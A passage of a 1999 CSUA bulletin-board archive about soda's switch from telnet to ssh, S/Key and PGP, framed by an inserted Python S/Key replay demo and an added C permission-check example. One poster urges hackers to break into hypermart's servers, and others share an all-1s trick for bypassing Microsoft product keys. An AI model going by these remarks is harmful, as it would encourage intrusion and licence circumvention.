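    def verify(self, user: str, response: bytes) -> bool:
        entry = self.users[user]
        if entry["seq"] == 0:
            return False
        # One more application of f() must give the value stored last time.
        if not hmac.compare_digest(f(response), entry["last"]):
            return False
        # Step down the chain: the accepted OTP becomes the new reference,
        # so the same value fails if it is presented again.
        entry["last"] = response
        entry["seq"] -= 1
        return True


def simulate_sniffed_session():
    """Log in once, replay the sniffed OTP, then log in again."""
    passphrase, seed = "constructed passphrase", "so12345"  # constructed values
    server = SKeyServer()
    server.keyinit("alice", seed, 99, otp(passphrase, seed, 99))

    count, seed_sent = server.challenge("alice")   # sent in cleartext
    sniffed = otp(passphrase, seed_sent, count)    # also sent in cleartext
    first_login = server.verify("alice", sniffed)

    # An eavesdropper replays what was seen on the wire.
    replay = server.verify("alice", sniffed)

    # The real user answers the next challenge, one step lower in the chain.
    next_count, _ = server.challenge("alice")
    second_login = server.verify("alice", otp(passphrase, seed, next_count))
    return {
        "first_login": first_login,
        "replay": replay,
        "next_count": next_count,
        "second_login": second_login,
    }


if __name__ == "__main__":
    print(simulate_sniffed_session())
```

To get past the next challenge an eavesdropper would have to invert f() on the sniffed value, which is the property the scheme relies on.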
1999/7/14-16 [Computer/SW/Security] UID:16133 Activity:high
7/14    For people whose firewalls allow telnet but not ssh, I set up scotch
        to redirect telnet and rlogin (ports 23 and 513) to soda's sshd.
        You should now be able to run "ssh -p23 scotch.csua.berkeley.edu"
        and log in to soda.  Thanks to alanc for suggesting this.  --mconst
        \_ My firewall runs telnet proxy.  I couldn't ssh before, but
           this works brilliantly.  Thanks, guys!  -John
        \_ note that this wont work if your firewall requires use of a
           proxified program to get through the firewall (like say telnet
           linked against the socks library)
           \_ You can run ssh through socks: use "./configure --with-socks"
              when you build ssh.  Note that most socks servers will let you
              connect directly to soda port 22.  If yours doesn't, you should
              still be able to use the telnet redirector on scotch.  --mconst
           \_ runsocks ssh then
           \_ note this is not intended as the solution to all ssh/firewall
                problems, just one set of them
        \_ mconst and alanc, that was a rad solution to the ssh problem!
           You guys RULE!  -ax
           \_ hey, i was the one who came up with having sshd listen to
              port 23.  i just didn't sign my name on the motd since i
              didn't know how it would be received among nit-picky admins.
                \_ I had that idea too.  It's a logical conclusion to reach.
                   The fact that they implemented it on Scotch ahead of
                   the switchover is what makes them rule.  -ax
                \_ I got credit simply because I MAILED ROOT with the
                   suggestion.  If you want to get people's attention,
                   direct e-mail beats anonymous MOTD posts any day. -alan-
                   \_ maybe i'll sign my motd posts with a pgp signature
                      next time. :-)
           \_ Yeah!  mconst for President!  mconst and alanc 2000!
1999/7/14-16 [Computer/SW/Security] UID:16131 Activity:moderate
7/14    When trying to connect to CSUA with F-Secure SSH 2.0.12 build 9 I'm
        getting the error "Disconnected;protocol version not supported."
        Anyone else get this, any ideas?
        \_ you're probably using the wrong protocol.  make sure you're using
           the right ssh protocols.
           \_ I don't get it.  Isn't CSUA an entirely non-profit
              organization for educational purpose?  Why can't we use ssh2?
              \_ People won't be able to connect from work.
           \_ ssh2 is supposed to be backwards compatible. use the -v flag
              next time and post the output.
              \_ ssh2 is not backwards compatible.  You will need to use an
                 ssh1 client to connect to soda; we can't run the ssh2 server
                 because it has a restrictive license.
           \_ Tried csua.berkeley.edu -v and received the error "No address
              associate with the name"  I do not see a place to change the
              protocols in F-Secure.
                \_ ssh2 is definitely not backwards compatible.  -tom
              \_ You need F-Secure SSH version 1.something.
              \_ And remember, tomorrow you won't be able to post this!
                 Have fun!
                 \_ S/Key works just fine.  It's a pain in the ass logging
                    in, but it requires nothing more than telnet.
1999/7/14-16 [Computer/SW/Security] UID:16130 Activity:high
7/14    My company firewall doesn't allow port 22 connection.  What should
        I do?  And getting my ignorant IS management people to open this port
        is probably harder than sleeping with their wives.  Is there an
        alternative way to ssh to soda?
        \_ If you find a port that your firewall allows, let us know and
           we can probably set up an extra sshd on that port.   --mconst
        \_ Try the port redirector I just installed on scotch (look three
           motd entries up).    --mconst
           \_ Thanks.  It works.
        \_ I find it very easy to sleep with IS management's wives.
           \_ Everyone who isn't an IS manager does.
        \_ .forward your email.  Your soda account by default is insecure
           since it is run and used by a bunch a hackers.
           \_ Huh?  How much more off topic could you get?
        \_ anyone notice you can telnet to another server and ssh from there?
           \_ Anyone notice how this COMPOUNDS the problem?  Don't.  --sowings
              \_ The PROBLEM is that soda isn't allowing telnet any more.
                 So no, it doesn't compound the problem
                 \_ Soda allows telnet.  It doesn't allow cleartext passwords.
                    Don't get mad, get clue.
                \_everything running over the telnet will be free game, before
                  it gets encrypted.
              \_ that was my point... a mandatory ssh on soda won't
                 necessarily force people to be safe...
                 \_ clue time: you can never force people to be safe.
                    \_ then why mandatory ssh?
                       \_ cuz smart people will simply download the software
                          and use ssh on the machine they're sitting at
                          instead of doing a roundabout telnet into another
                          machine.  which one is more of a hassle?
                          apparently some people think it's more convenient
                          to telnet then ssh each time. but then again,
                          berkeley admits some pretty stupid people.
                          \_ Worse yet, they give them degrees.
1999/7/12-14 [Computer/SW/Security, Transportation/Bicycle, Computer/SW/OS/Windows] UID:16115 Activity:high
7/12    a good windows mail client that supports pgp?  Wait, i know, RIDE
        BIKE, use linux, I DO, but i need *others* to use pgp with and
        the others use windows.
        \_ Outlook
           \_ Outlook?  What version?  Last v. I tried was complete trash.
        \_ ok, pardon my ignorance, but could someone please explain the
           connection between Linux and RIDE BIKE ?
           \_ Guessing: someone is mocking the attitude/mentality of both
              groups?
              \_ How does that differ from the 50 million "Windoz Rulez,
                 use windows" that also go on the motd, not to mention that
                 their attitudes and mentality are usually worse.  I also
                 seem to remember a quote, "drive a fucking car you hippie"
                 posted somewhere on a long ago motd showing that non-bike
                 riders are just about as bad.
                 \_ Who said it differed?
                 \_ PGP for Windows (commercial, from NAI) will integrate
                    well with Eudora Light or Pro.  However, Eudora light
                    tends to corrupt important Windows files and generally
                    suck.  --dbushong
        \_ ride bike.
        \_ use freebsd.
        \_ use linux.
           \_ freebsd >> linux
        \_ use Motd::Public;
        \_ Less filling >> tastes great
1999/7/11-14 [Computer/SW/Security] UID:16104 Activity:low
7/10    Anyone know if someone has written an SKey generator for the
        Palm OS?  Would be handy to have the key generator handy...
        \_ http://astro.uchicago.edu/home/web/valdes/pilot/pilOTP
           i haven't tried it yet tell me if it works  --oj
                \_ YES, it works.  just logged in with it.  thanks!
                   no excuses to not use skey now...
                   \_ How about, "I don't have a Palm Pilot"?
        \_ Any source code out there for S/Key?
           \_ /usr/src/usr.bin/key/skey.c on soda  --dbushong
1999/7/6 [Recreation/Dating, Computer/SW/Security] UID:16085 Activity:nil
7/6     Do you guys think that http://whitehouse.com shouldn't be what it is?
1999/7/2 [Computer/SW/Security] UID:16057 Activity:high
7/1     Sorry to bring another ssh question to the motd, but I thought
        others might be interested.  So my company doesn't have ssh
        installed, but there *is* a machine I can telnet out of without
        going through the proxy.  I compiled ssh over there, and I can't
        get it to connect to soda.  I checked man pages, and the ssh url
        above, but it still dies.  Here's the command line and result:

        > ssh -a -v -l emarkp soda.csua.berkeley.edu
        SSH Version 1.2.27 [sparc-sun-sunos4.1.4], protocol version 1.5.
        Standard version.  Does not use RSAREF.
        host183: ssh_connect: getuid 27243 geteuid 27243 anon 1
        host183: Connecting to soda.csua.berkeley.edu [128.32.43.52] port 22.
        host183: connect: Connection timed out
        host183: Trying again...

        Any ideas on how to fix? -emarkp
        \_ ssh on outgoing port 22 on your firewall is blocked,
           as in not open.
           \_ but emarkp was able to get "ssh-1.5-1.2.26" from telnet pt 22?
        \_ woah, they have suns at intel?
           \_ ssssh!  Don't let anyone else know. :)  I don't know how
              long this system has been in place.  --emarkp
              \_ suns are better than intels. and for that matter, so is
                 everything else. but intels are cheap which is good
                 enough for my purposes.
        \_ try it again now that the campus network is back up...
           \_ I did.  There wasn't even this much when the network was
              down. --emarkp
        \_ Hint: try  "telnet soda.csua.berkeley.edu 22" first.
           and say hello to mister firewall.
           \_ Actually, I got through.  That is, it said:
              Connected to soda.csua.berkeley.edu.
              Escape character is '^]'.
              SSH-1.5-1.2.26
              -- emarkp
                \_ Now remove the setuid root bit from ssh.
1999/6/30-7/1 [Computer/SW/Security] UID:16045 Activity:nil
6/30    Telnet access to Melvyl and Gladis turned off for security
        reasons. ssh only.
        \_ I thought you didn't need a password to get on the library
           database.  Is that true?  If so, why does it matter if it's
           secure or not?
           \_ Um, have you ever heard of sarcasm?  How about trying
              "telnet melvyl" yourself to see if this was accurate (it's
              not).
                \_ Imagine that!  Someone sniffing my melvyl login and doing
                   their own research!  Nefarious!
1999/6/30-7/1 [Computer/SW/Security] UID:16040 Activity:moderate
6/30    I asked another host machine to install a ssh client so that I could
        telnet there and then ssh to soda.  Thing is, I can't connect
        because soda doesn't support ssh protocol v2.  Does anyone know
        about plans to change this?
        \_ there's a slightly easier way to do this and it doesn't involve
           asking someone else to install something for you.
        \_ when data fellows makes their ssh2 implementation less stupid
           about their license.
        \_ ssh2 is still in testing and not free for use.  Have them install
           ssh1 as well.
        \_ Ride BIKE!
        \_ Compile your own.
        \_ Interestingly (to me anyway), this only puts the security breach
           one step back.  Instead of a cracker sniffing your soda account,
           they can sniff your other telnet account, and then ssh from there
           to soda and wreak all sorts of terrible havoc!
           \_ the point is that soda's subnet is filled with lemurs.
           \_ Telneting somewhere just to be able ssh to soda is a really
              stupid idea.  It not only defeats the security that the soda
              admins are trying to establish, but also compromises the other
              account as well.  Get off your ass and install ssh on your own
              machine or explore the possibility of using s/key.
              \_ The soda admins are trying to protect against sniffers on this
                subnet.  Telnet->ssh is no dumber than purely telnet,
                and given the number of lemurs probably a bunch safer.
1999/6/28 [Computer/SW/Security] UID:16029 Activity:high
6/28    The CSUA account is mainly for social use, and it's not a
        mission-critical system. I've been using the Soda account for
        almost 6 years, and have found it's very convenient since it does
        not impose many of the restrictions of regular ISP accounts.
        Therefore, I was quite puzzled by the SSH stuff -- I understand
        the importance of security, but isn't the CSUA system a
        hacker's system? The decentralized nature of Soda is what made it
        wonderful. If the current CSUA leadership wants to impose the
        security measures, can you at least ask for feedback and inputs
        from the users? I was surprised to see the login message without
        hearing anything about the merit of this decision. I suggest for
        now, the decision to shut down telnet should be postponed.
        \_ I second that motion (even though this thread already ran a few
           days ago)
        \_ Need to have the rms:rms account turned on.
1999/6/27-7/15 [Computer/SW/Security] UID:16023 Activity:nil
06/25 IMPORTANT INFORMATION:

   ************************************************************************
   * Secure password software will be REQUIRED starting July 15th, 1999   *
   ************************************************************************
   *     Starting July 15th, all remote logins to CSUA Computers will     *
   *      require an ssh enabled program for login over the network;      *
   *                                                                      *
   *        -=  STARTING JULY 15th TELNET WILL BE DISALLOWED. =-          *
   *                                                                      *
   *                   For detailed information see:                      *
   *    /csua/adm/doc/ssh-howto   or                                      *
   *    http://www.csua.berkeley.edu/ssh-howto.html                       *
   *             If you have questions, please mail help@csua             *
   ************************************************************************
1999/6/25 [Computer/SW/OS/OsX, Computer/SW/Security] UID:16017 Activity:high 66%like:16014
6/24    It's about time EECS instructional finally enforced an ssh only policy.
        \_ Report them to the Commerce Dept.  They're allowing foreigners to
           use encryption!  That's illegal, the unamerican scum.
           \_ Fuck you.  --sowings
           \_ Oh no, we wouldn't want that to happen would we?
        Now for every other machine on campus to follow suit.
                                                        \_ ^suit^suite
                                                        \_ it's suit, dumbass
        \_ Funny, it's rare that we're in the vanguard.  You should check
           "finger @cory.eecs" though--lots of lusers still stuck with telnet.
                                                                --sowings
           \_ What the hell is so hard about using ssh? ^telnet^ssh
                \_ Part of it may be that users are at a commercial site with
                   a non-SSH-friendly firewall.  --sowings
                \_ Not everyone uses an OS that has ssh.  Not everyone has
                   an OS.  Don't be so OScentric.
                   \_ Everybody IS using an OS that can run ssh (no I'm
                      not talking about Palm Pilots).
                        \_ I work at a secure site that has a terminal/modem
                           that I use to dialout to an annex box on campus
                           and then telnet to soda.  Who the fuck are you to
                           tell me my OS supports ssh?  I don't have an OS,
                           dumbshit.
                           \_ will EECS install an s/key server?  we do that
                              here for cases like this, because we don't
                              trust users to protect their reusable passwords.
              \_ Furthermore, some of us work behind a firewall which
                 does not have ssh enabled (I know how stupid that
                 sounds, but it's true).
                 \_ I use ssh behind a firewall all the time.  Mail root
                    and tell him what a moron he is for configuring a
                    firewall improperly.
        \_ I would love to use SSH -*BUT*- there is *NO* free ssh for windows
                I know you'll all say use linux, but I don't - so there!
                \_ There have been free versions for quite a while loser.
                   http://www.net.lut.ac.uk/psst Get a new excuse.
                   \_ And given that Window$ versions are already compiled
                      they have less of an excuse not to use ssh than Unix
                      people do. Yet the statistics reflect the opposite.
                      \_ WinBlows twits are stupid.  proof: axiom 1.
           \_ Windows: http://www.zip.com.au/~roca/ttssh.html
              Mac:     http://www.lysator.liu.se/~jonasw/freeware.html --dim
           \_ TeraTerm? http://depot.berkeley.edu always has free stuff.
           \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
              issue?
              \_ porting stuff across unix tends to be very easy (ie. almost
                 nothing to do) whereas writing a port for Win or Mac is a
                 total pain in the ass to do.  Hence, people who do write
                 the ports ask for $$$.
                 \_ They must be evil for not doing it out of the GNUoodness
                    of their hearts and for the love of technology.
           \_ A free port at
              http://akson.sgh.waw.pl/~chopin/ssh/index_en.html
        \_ just a random check on soda:
           netstat -n | awk '($4 == "128.32.43.52.22") {print}' | wc -l
                126
           netstat -n | awk '($4 == "128.32.43.52.23") {print}' | wc -l
                83
            --jon
            \_ what is port 22 for?
                \_ ssh moron
                   \_ why did this deserve a "moron"? i'm sure at one time
                      you didn't know what port 22 is for, or even what a
                      port was.
                        \_ look in /etc/services moron
                           \_ Wow, you're a real asshole.  The guy knew what
                              the command line did, but didn't know a lousy port
                              number and isn't a linux s00per g0r0 like you
                              so he's a moron?  Are you Trevor Buckingham?
                              \_ No, *I* am Trevor Buckingham!
                                 \_ Please start smoking pot instead of crack.
                                \_ I am Jean Valjean
                                   \_ My name is Paolo Soto, you got into the
                                      LSCS major, prepare to die.
1999/6/24-25 [Computer/SW/Security, Computer/SW/OS/OsX] UID:16014 Activity:very high 66%like:16017
6/24    It's about time EECS instructional finally enforced an ssh only policy.
        Now for every other machine on campus to follow suit.
        \_ Funny, it's rare that we're in the vanguard.  You should check
           "finger @cory.eecs" though--lots of lusers still stuck with telnet.
                                                                --sowings
           \_ What the hell is so hard about using ssh? ^telnet^ssh
                \_ Not everyone uses an OS that has ssh.  Not everyone has
                   an OS.  Don't be so OScentric.
        \_ I would love to use SSH -*BUT*- there is *NO* free ssh for windows
                I know you'll all say use linux, but I don't - so there!
           \_ Windows: http://www.zip.com.au/~roca/ttssh.html
              Mac:     http://www.lysator.liu.se/~jonasw/freeware.html --dim
                \_ TeraTerm? http://depot.berkeley.edu always has free stuff.
           \_ Why is ssh free for UNIX but not for Win or Mac? Is it a patent
              issue?
              \_ porting stuff across unix tends to be very easy (ie. almost
                 nothing to do) whereas writing a port for Win or Mac is a
                 total pain in the ass to do.  Hence, people who do write
                 the ports ask for $$$.
                 \_ They must be evil for not doing it out of the GNUoodness
                    of their hearts and for the love of technology.
           \_ A free port at
              http://akson.sgh.waw.pl/~chopin/ssh/index_en.html
1999/6/22-25 [Computer/SW/Security] UID:16002 Activity:moderate
6/21    Can anyone give a pointer to a utility that will recover passwords
        from a MS Access .mdw workgroup file?
        \_ http://www.lostpassword.com -shac
        \_ Can anyone give a pointer to a utility that cracks passwords
           on Access files?  How about Unix /etc/passwd files?  MS
           installer codes?
                \_ MS Install product keys: Try using all 1's.  Works every
                   time I've tried it!  Office, DevStudio, SourceSafe, etc.
                        \_ Some take all 0's instead/as well.
                        \_ I think only the CS department copies can do that.
                           Normal Office/DevStudio CDs don't allow that.
                           \_ UC doesn't get special copies of anything.  I've
                              seen the boxes, installed the software, etc.  It's
                              generic.  At least for Office and the OS.  Didn't
                              install DS but the CD's looked the same.
                        \_ All "4" works on some stuff too.
        \_ fdisk.
1999/6/18-19 [Computer/SW/Security, Computer/SW/Unix] UID:15985 Activity:very high
6/18    How much for a life account on soda?
        \_ soda account and having a life are mutually exclusive.
        \_ u must FIRST bring back root a SHRUBBERY!
            \_ namely marijuana
               \_ or MDMA
                \_ dissociatives are bad for you.
                   \_ It's all bad for you.
                      \_ is this what you learned from government sanctioned
                         propaganda and programs like D.A.R.E ? You're the kind
                         that they like, follow directions, don't question
                         authority and you'll do fine.
                         \_ No, child, this is what I learned from
                            watching my girlfriend destroy her life.
                            You're a prick.  Little wannabe druggy
                            fucks all think they're so smart and anti-
                            government-conspiracy and all that bullshit.
                            Well, clue time.  You're just a dumb shit
                            moron burning out your brain and body.
                            I'm not a child of the DARE generation.
                            I'm a child of the been-there-knows-that-
                            first-hand generation.
                         _/
                   Then someone of your OBVIOUS wisdom, and intellect
                   would surely refrain from generalizing comments
                   like, "it's all bad" I bow before your unending
                   insight and wisdom, but clearly you can't be
                   serious about comparing your crack-whore gf to
                   an occasional pot smoker or social drinker.
                        \_ You're a prick.  Please dope up and drive off a
                           cliff and drown to death.  The world will be a
                           better place.
        \_ First you must get a life.  Life accounts are only awarded to those
           who graduate with all 5 life points.
1999/6/11-12 [Computer/SW/Security, Computer/HW] UID:15946 Activity:high
6/11    Thirdvoice again!  http://nototv.hypermart.net
        seems they have added some javascript, and put it into the
        public domain, that hoses thirdvoice's functionality.  they
        are using refresh loops (KLUDGE) to flush the notes every
        1000 milliseconds or something.  really screwy, and it
        has a tendency to crash things.  also, thirdvoice's server has
        been hosed today.  i am thinking that with each flush, my
        client tries to get the notes from thirdvoice, then the
        connection gets abandoned and leaves a zombie http connection
        that their server takes x tens of seconds to flush out.  so,
        the hypermart people are, in a way, mounting an attack on
        thirdvoice.  probably a great time for any of you good hackers
        to get into hypermart and fuck shit up.  -caliban
        \_ can't you just hit the Stop button / Escape?
        \_ All I can say is kludges are just that, kludges.  -Judd
        \_ thirdvoice is really racking up the enemies.  Either abovenet
            died or someone threw a denial of service attack at them.
            \_ got any more info?  -caliban
                \_ I do.  Send a resume.  :-)   -Judd
                \_  it was just paranoia -- one of abovenet's cat5000's
                    'got confused'.
        \_ apparently http://www.macosrumors.com has come out against 3v too -caliban
            \_ I'm tellin you, its all them snooty web designers, who dont
               want to hear someone making bad comments on their sites. -ERic
            \_ I'm against hatred and war.  Hasn't stopped hatred and war.
1999/6/8-9 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:15917 Activity:high
6/8     Commentary on third voice:
          http://www.macnn.com/contributions/webpages.shtml
          \_ can anyone see the notes posted on that page?  i have
             thirdvoice installed, and it works on other pages.  there
             are notes posted on that page; thirdvoice pulls up the
             topics in their frame but i am unable to read them.
             clicking on the note icon in the text does not work.
             i get an occasional javascript error, i wonder if they
             are hosing the thirdvoice stuff somehow.  --caliban
             \_ I can read it ok.  That's what public betas are for.  If you
                mail your system details and the URL to feedback@thirdvoice.com
                someone will check it out.  -Judd
             \_ strangely enough that site's annotations are failing in my
                3rdvoice client too. -Eric
          \_ Watch the web designer weenies whine!  They just can't share the
             internet.
          \_ Amazing! Singaporeans pushing the limits of free speech.
            \_ Yeah, go figure!
1999/6/4-5 [Computer/SW/Security] UID:15906 Activity:moderate
6/4     http://Amazon.com wanx.  Amazon lets the publishers have access to
        customer reviews two days BEFORE they are actually posted,
        giving them time to write up two or three 'good' reviews
        the same day the 'not-so-good' review comes out.  Eg., look
        for books written by Steve S. Miller, published by McGraw Hill.
        His books absolutely suck, but he somehow has all these
        totally cheesy reviews posted by anonymous readers who all
        say the same overly complimentary things.  Stuff you'd never
        find on the Soda motd.
        \_ sounds legal and like standard business practice to me
        \-while i think this kind of disclosure/discussion is useful, i dont
        look to amazon for book reviews ... i want one thing from them and
        that is cheap prices and decent customer service. in my experience
        "truth" comes out of a dialectic ... from reading multiple sources.
        generally you shouldnt look for "one reliable source" ... unless
        it is me or the economist. --psb
        \_ Uh, The Economist has its idiosyncracies too (e.g., declaring that
        Clinton should resign the week Monica-gate broke: a little
        premature, as they themselves later admitted) --Economist Reader
1999/5/23-25 [Computer/SW/Security, Computer/SW/Unix] UID:15862 Activity:high
5/23    Did you hear that Ari and Christine are married?
        \_ "If you need to ask, you don't know."
        \_ Why should we care?
        \_ How many times have we heard about this?
        \_ Which Christine?  (Which login?)
                \_ the one with 3 different logins because she can't make
                         up her mind.
                \_ The one that's been living with ari for years.  If you
                   don't know her login, you don't know her and don't need
                   to know.  (Hint: If you pay any attention to walls, you
                   know who.)
                \_ Why does anyone care?  Just shut up.  It's not like, "Did
                   you hear Ari and Christine are tag team serial killers?"
                   \_ This is outrageous.  There is no evidence that
                      Christine has helped Ari with any of his crimes,
                      especially not serial killing.
                        \_ there's a website out there of her holding down
                           twaung while ari rapes him
                           \_ http://www.networkgen.com/~twaung/images/bean1.jpg
                              \_ Damn!  I got 403 Forbidden.
                              \_ what kind of lamer puts an image in
                                 his PUBLIC HTML "images" directory, then
                                 revokes view privilege for it? Either
                                 have it there, or not. sheesh.
                           \_ I thought it was Ari holding him down while
                              xtine raped him.
                   \_ I just want to check out her pics if she has a home page,
                      to see how lucky/unlucky Ari is.
                        \_ Ari is filthy rich, Christine is a lot hotter than
                           your hand, you just lose in comparison.
                           \_ I dunno dood....My hand is pretty good looking.
                        \_ ~chris
                        \_ Boy-child, luck has nothing to do with it.  The
                           sooner you get over that idea, the sooner you'll
                           be making love to a woman instead of your hand.
                           \_ And if you're Ari, this will include cheating
                              too.
                              \_ What?  Do tell!
                           \_ That was what I thought until I have this
                              hot babe fall from the sky.
                                \_ What'd she weigh?  Or did you let her
                                   bounce a few times first?
1999/5/20-21 [Computer/SW/Security] UID:15848 Activity:nil 66%like:16541
5/20    Access to Software for All People jobs is /csua/pub/jobs/ASAP
1999/5/19-20 [Computer/SW/Security, Computer/SW/Unix] UID:15840 Activity:high
5/19    Dear root
            It would be really cool if you could remove all the old job
            listings from /csua/pub/jobs, I'd be more than happy to do
            it myself but my BSD security compromising fu is lacking.
            You see I need to find a job so I can afford an NT license,
            I can't get any work done without that wonderful paperclip
            helping me along the way. Thank you very much and may god
            love you for ever.                  job-less on CSUA
            \_ find a headhunter.  try http://dice.com
            \_ Wired is hiring.  http://www.hotwired.com/jobs  good luck.
            \_ ls -l will tell you when a company's job listing was
               last fiddled with.  Old listings' job openings probably
               don't exist, but the company probably still does.  If
               the company sounds interesting, try their website.
1999/5/17-18 [Academia/Berkeley/CSUA, Computer/SW/Security, Computer/SW/Unix] UID:15822 Activity:kinda low
5/17    PLEASE clean up your old crap in the /csua/pub/job dir!
        \_ I'd like to, but all the files and dirs I put there before are now
           owned by root.
Darth Maul kills Qui-Gon.
                \_ root would be happy to help you with this problem.
1999/5/15 [Computer/SW/Security, Computer/SW/Unix] UID:15815 Activity:high
5/15    It's the "Message Of The Day", not "Messages Of Last Week".
        If you don't want it nuked, start something fresh.
        \_ It's also not the standard root-only motd.  You want it wiped
           once a day, petition root to make a cron job.  Since you obviously
           don't "get it", just use a .hushlogin and leave the rest of us
           alone.
        \_ I don't want it wiped once a day, I want it to not be full of
           stupid trollfests from a week ago that keep getting replaced
           by the original trollers.
           \_ Dumbshit, nothing on the motd was more than 48 hours old.  Get
              a fucking calendar.
        \_ maybe ERic should stop rcsing the motd.  That is how people
           get old copies to replace it with.
           \_ No it isn't.  It is actually possible to save a copy yourself.
              This may come as a stunning revelation to you, but the cp
              command isn't root only.
1999/5/7 [Computer/SW/Security] UID:15769 Activity:high
5/6     /usr/local/bin/premail is installed.
        It connects to the "nym" remailer.
        It requires pgp2.6 to work.
        The nym server uses a 2048 bit key.
        Ours only supports 1024 bit keys.
        \_
        jon@soda:~ ttyRP 1:19:07am 6% pgp -kg
        Pretty Good Privacy(tm) 2.6.2 - Public-key encryption for the masses.
        (c) 1990-1994 Philip Zimmermann, Phil's Pretty Good Software. 11 Oct 94
        Uses the RSAREF(tm) Toolkit, which is copyright RSA Data Security, Inc.
        Distributed by the Massachusetts Institute of Technology.
        Export of this software may be restricted by the U.S. government.
        Current time: 1999/05/07 08:22 GMT
        Pick your RSA key size:
            1)   512 bits- Low commercial grade, fast but less secure
            2)   768 bits- High commercial grade, medium speed, good security
            3)  1024 bits- "Military" grade, slow, highest security
        Choose 1, 2, or 3, or enter desired number of bits: 2048
        Generating an RSA key with a 2048-bit modulus.
        --I dont know who the fuck you are, but 1) you didnt mail root
        and 2) you arent even smart enough to read the fucking directions
        that pgp gives you on a fucking silver platter.  --Jon
        \_ Valium, homeboy.  He probably meant that pgp supports a
           maximum 1024 bit keylength.  -John
                \_ but it doesn't.
                   \_ Yes, I know that, and you know that, but it didn't
                      show up in the options and he was probably tired
                      and didn't think that far.  No reason to go apeshit.
                                                        -John "fuck"
                        \_ weird. tried again, it worked now. But it
                           failed before, complaining about keylength.
        \_Why is soda stuck on 2.6.2?  PGP 5 is available for *NIX, with 6
        available within the month.  6 supports 4096-bit keys, which if you
        read Cryptonomicon (Neal Stephenson's new book) is secure for 100 years
        and may even be suitable to keep secure until men are no longer
        capable of evil! (forever).  As far as I know, the book does not have
        a protagonist who attended UCB in the 90's and studied CS (as snow
        crash did) --cody
        \_
        /usr/local/bin/pgp      /usr/local/bin/pgpencrypt
        /usr/local/bin/pgp5             /usr/local/bin/pgpk
        /usr/local/bin/pgp_old          /usr/local/bin/pgps
        /usr/local/bin/pgpdecode        /usr/local/bin/pgpshow
        /usr/local/bin/pgpe             /usr/local/bin/pgpsign
        /usr/local/bin/pgped            /usr/local/bin/pgpv
        --Jon. Hint Hint, it is possible to have both installed.
1999/4/5 [Computer/SW/Security] UID:15695 Activity:high
4/5     If sshd does host authentication for .shosts files why do people still
        say that .shosts is still insecure.  This is assuming that all the
        entries point to a computer that I maintain and I am the only user
        on that system.
        \_ how do i use shosts?  is it the same as rhosts?
        \_ if someone breaks into that system, they can steal the host
           key.  But .shosts is reasonably secure. -tom
           \_ How secure is having tcp-wrappers blocking all external
              connections and running this computer on a ppp dialup
              connection that times out after 15 minutes of inactivity.
              I'd think it would be pretty obvious if someone broke in.
                \_ tcpwrappers probably doesn't wrap all your services. -tom
1999/3/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:15662 Activity:nil
3/30    In a /lib /usr/lib directory what's the diff between a lib*.a and
        a lib*.so file?
        \_ .a is "archive" and produces static (compile-time) linking, while
           .so is "shared object" and produces dynamic (run-time) linking.
           \_ so what the heck is "linking"?
                \_ man ld
              \_ well, if you're a DOS weenie, a .so file is like a .DLL file
                 in short: .a files are things that get added to your program
                 when you compile it; people don't need them to run the
                 executable, but it's huge.  .so files get "added" (linked)
                 when a person runs the program, so they need to have copies
                 of them, but the executable is smaller.  generally .so
                 (shared libraries) are better because then 100 programs on
                 your machine can use one library without (essentially) having
                 100 copies of the library present in every executable -dbushong
1999/3/29-30 [Computer/SW/Security] UID:15652 Activity:moderate
3/29    Is there a cel phone service in the area that lets me call in the
        entire state?  I want to be able to use it both here and Los Angeles.
                                                        -- brendal
        \_  yes.  have you even looked at any of the service providers yet
            at all?  cellone and gte have both been advertising this sort
            of option heavily.  the former lets you call from anywhere in
            california but hasn't come out with a nationwide plan yet.  gte
            has a national onerate service plan.
        \_ Pacbell PCS does it if you get an extra $20/month plan named
           WildFire.  GTE does not do it.  L.A. is roaming at 0.40/min.
           Sprint does it but has no coverage on the long-distance freeways.
           PacBell and CellOne are the solid west-coast choices.  Otherwise
           GTE or Sprint would be cheaper if you are on the east coast too.
1999/3/29-30 [Computer/SW/Languages/C_Cplusplus, Computer/SW/Security] UID:15649 Activity:moderate
3/29    How do I test to see if a file has "other" +"read" permissions in C?
        \_ man 2 stat?
        \_ or check out the access(2) manpage.
           \_ stat doesn't have anything to do with accessibility and access uses
              user ID to check for access
                \_ which part of "mode" don't you understand?
                \_ stat has this:
                        mode_t st_mode /* File mode */
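The stat(2) answer in the thread above, written out as an added example (not code posted by anyone in the thread). It tests the "other" read bit in st_mode and, for contrast, calls access(2), which answers whether the calling user can read the file; the helper with_temp_mode() and the /tmp path are assumptions made for the demonstration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Returns 1 if the "other" read bit is set on path, 0 if it is clear,
 * and -1 if stat() fails (missing file, unsearchable directory, ...).
 * stat() follows symlinks, so this reports on the link's target. */
int other_can_read(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return (st.st_mode & S_IROTH) ? 1 : 0;
}

/* Returns 1 if the calling process's real uid/gid may read path.
 * This is a different question: it is about the caller, not "other". */
int caller_can_read(const char *path)
{
    return access(path, R_OK) == 0 ? 1 : 0;
}

/* Hypothetical demo helper: create a scratch file, force its permission
 * bits to exactly `mode` (fchmod is not affected by the umask), run
 * `check` on it, then clean up.  Returns what `check` returned, or -1
 * if the scratch file could not be set up. */
int with_temp_mode(mode_t mode, int (*check)(const char *))
{
    char path[] = "/tmp/otherread-XXXXXX";
    int fd = mkstemp(path);
    int result;

    if (fd < 0)
        return -1;
    if (fchmod(fd, mode) != 0) {
        close(fd);
        unlink(path);
        return -1;
    }
    result = check(path);
    close(fd);
    unlink(path);
    return result;
}

int main(void)
{
    printf("0644 other-read bit : %d\n", with_temp_mode(0644, other_can_read));
    printf("0640 other-read bit : %d\n", with_temp_mode(0640, other_can_read));
    printf("0600 other-read bit : %d\n", with_temp_mode(0600, other_can_read));
    /* Same 0600 file: the owner can still read it, so access() says yes. */
    printf("0600 access(R_OK)   : %d\n", with_temp_mode(0600, caller_can_read));
    return 0;
}
```

The bit test only says what the mode word grants to "other"; a parent directory without search permission can still block the read.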
1999/3/12-13 [Computer/SW/Security] UID:15584 Activity:nil
3/11    There's ssh and scp.  Is there sftp?  I want to interactively get
        and put a file.  scp is rather inconvenient.
